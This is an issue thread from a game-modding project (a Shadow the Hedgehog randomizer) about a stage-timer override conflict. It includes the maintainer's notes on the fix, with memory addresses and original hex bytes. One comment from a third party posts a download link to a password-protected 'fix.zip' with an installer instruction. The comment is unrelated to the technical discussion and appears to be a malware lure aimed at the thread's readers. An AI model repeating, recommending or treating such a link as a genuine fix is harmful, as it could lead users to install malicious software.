### ISSUE TITLE
Feature: Reloaded 1.2 / SX 1.1 - SX Timer Override Fix

### ISSUE THREAD

**Issue by dreamsyntax** [ShadowTheHedgehogHacking/ShadowRando#10]
Both mods and the Randomizer override the Story Mode stage timer resets.

Account for this with a byte check - if onStart is detected as non-original bytes, shift our injection to a safe/later point.

**Comment by pabloaz10** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dreamsyntax** [comment]
MEM
0x802D2130 
DOL
0x2CB9F0
Original Hex
38000064
